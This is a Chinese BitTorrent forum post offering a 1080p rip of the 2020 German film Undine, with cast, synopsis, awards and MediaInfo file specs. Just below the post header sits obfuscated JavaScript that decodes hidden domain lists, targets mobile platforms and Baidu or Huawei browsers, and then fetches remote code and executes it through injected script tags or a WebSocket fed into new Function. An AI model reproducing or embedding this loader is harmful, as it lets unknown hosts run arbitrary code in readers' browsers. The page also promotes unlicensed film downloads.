温蒂妮[中文字幕]迅雷下载.Undine.2020.1080p.BluRay.DTS.x265-10bit 5.05GB

版主小s 27天前 353

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 温蒂妮 / 乌丁娜 / 水漾的女人(台) / 水精灵之恋(港)

◎片 名 Undine

◎年 代 2020

◎产 地 德国 / 法国

◎类 别 剧情 / 爱情

◎语 言 德语 / 英语

◎上映日期 2020-02-23(柏林电影节) / 2020-06-11(德国)

◎IMDb评分 6.4/10 from 2983 users

◎IMDb链接 https://www.imdb.com/title/tt11617052

◎豆瓣评分 7.4/10 from 16796 users

◎豆瓣链接 https://movie.douban.com/subject/34603816/

◎片 长 90分钟

◎导 演 克里斯蒂安·佩措尔德 Christian Petzold

◎编 剧 克里斯蒂安·佩措尔德 Christian Petzold

◎主 演 葆拉·贝尔 Paula Beer

弗兰茨·罗戈夫斯基 Franz Rogowski

玛丽安·扎瑞 Maryam Zaree

雅各布·马琛茨 Jacob Matschenz

安妮·拉特-波利 Anne Ratte-Polle

拉斐尔·斯塔霍维亚克 Rafael Stachowiak

格洛丽娅·安德雷斯·德·奥利维拉 Gloria Endres de Oliveira

◎标 签 德国 | 爱情 | 奇幻 | 2020 | 柏林电影节 | 剧情 | 德国电影 | 克里斯蒂安·佩措尔德

◎简 介

影片设定在当下的柏林,女主角温蒂妮是一名城市发展局的顾问。她的现任男友忽然提出分手,此时一个古老的诅咒似乎正要应验。中世纪的传说里,温蒂妮是水中的精灵,倘若与她们结合的男人背叛了她们,她们就会杀死男人并回归水中。电影的女主角想要抵抗这一诅咒,故而离开了柏林。此时她结识了克里斯多弗,一名在德国西部水库区工作的工业潜水员。两人相爱。不久后克里斯多弗察觉到,温蒂妮似乎在逃离什么,感觉受到了背叛...《温蒂妮》是导演佩措尔德计划的“元素精灵三部曲”的第一部。接下来的两部将分别涉及气精灵西尔芙和地精灵诺姆。

◎获奖情况

第70届柏林国际电影节(2020)

金熊奖(提名) 克里斯蒂安·佩措尔德

银熊奖 最佳女演员 葆拉·贝尔

费比西奖(国际影评人联盟奖) 竞赛单元最佳影片

第33届欧洲电影奖(2020)

最佳影片(提名)

最佳女主角 葆拉·贝尔

第10届北京国际电影节(2020)

天坛奖(提名) 克里斯蒂安·佩措尔德

第24届美国在线影评人协会奖(2021)

最佳非北美上映影片

第7届豆瓣电影年度榜单(2020)

评分最高的爱情片(提名)

  1. General

  2. Unique ID : 279777939836730488763824450034634282176 (0xD27B456E166AD96D3A684E19FB7B54C0)

  3. Complete name : Undine.2020.1080p.BluRay.DTS.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 5.05 GiB

  7. Duration : 1 h 29 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 8 081 kb/s

  10. Movie name : Undine 2020 1080p BluRay DTS x265-10bit-HDS

  11. Encoded date : UTC 2021-05-12 20:30:05

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 29 min

  21. Bit rate : 6 410 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 036 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.134

  31. Stream size : 4.01 GiB (79%)

  32. Title : [email protected]

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS XLL

  39. Format/Info : Digital Theater Systems

  40. Commercial name : DTS-HD Master Audio

  41. Codec ID : A_DTS

  42. Duration : 1 h 29 min

  43. Bit rate mode : Variable

  44. Bit rate : 1 648 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 16 bits

  50. Compression mode : Lossless

  51. Stream size : 1.03 GiB (20%)

  52. Title : German

  53. Language : German

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 22 min

  63. Bit rate : 18.4 kb/s

  64. Count of elements : 1104

  65. Stream size : 10.9 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 22 min

  77. Bit rate : 19.3 kb/s

  78. Count of elements : 1104

  79. Stream size : 11.4 MiB (0%)

  80. Title : CHT

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Menu

  85. 00:00:00.000 : en:Chapter 01

  86. 00:07:31.625 : en:Chapter 02

  87. 00:13:08.625 : en:Chapter 03

  88. 00:21:38.667 : en:Chapter 04

  89. 00:29:51.875 : en:Chapter 05

  90. 00:36:12.708 : en:Chapter 06

  91. 00:44:54.625 : en:Chapter 07

  92. 00:52:55.958 : en:Chapter 08

  93. 01:03:24.042 : en:Chapter 09

  94. 01:10:51.292 : en:Chapter 10

  95. 01:16:14.542 : en:Chapter 11

  96. 01:26:32.208 : en:Chapter 12



此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情 爱情

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖